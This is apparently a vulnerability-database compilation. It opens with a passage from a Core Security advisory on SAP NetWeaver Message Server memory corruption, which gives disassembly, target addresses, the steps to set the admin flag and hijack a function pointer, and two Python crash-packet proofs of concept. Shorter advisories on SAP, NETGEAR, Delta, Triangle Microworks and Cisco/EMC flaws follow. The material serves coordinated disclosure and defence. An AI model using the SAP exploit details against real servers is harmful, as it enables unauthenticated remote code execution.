j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-201208-0222 Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
var-202307-1321 NETGEAR ProSAFE Network Management System MyHandlerInterceptor Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of NETGEAR ProSAFE Network Management System. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MyHandlerInterceptor class. The issue results from improper implementation of the authentication mechanism. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19718
var-201805-1147 WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability 3. Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable
var-202409-0396 Triangle Microworks TMW IEC 61850 Client source code libraries before 12.2.0 lack a buffer size check when processing received messages. The resulting buffer overflow can cause a crash, resulting in a denial of service. SICAM 8 Power automation platform is a universal, hardware- and software-based, all-in-one solution for all applications in the field of power supply. SICAM A8000 RTUs (Remote Terminal Units) are modular devices for remote control and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SICAM SCC is a process and visualization system for energy automation solutions. SITIPE AT (Automated Testing) is a computer-aided test system for integrating and simplifying functional test procedures for substation automation, remote control and protection panels manufactured by Siemens. A buffer overflow vulnerability exists in third-party components of Siemens SICAM and SITIPE products. An attacker can exploit this vulnerability to create a denial of service condition by sending a specially crafted MMS message
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: 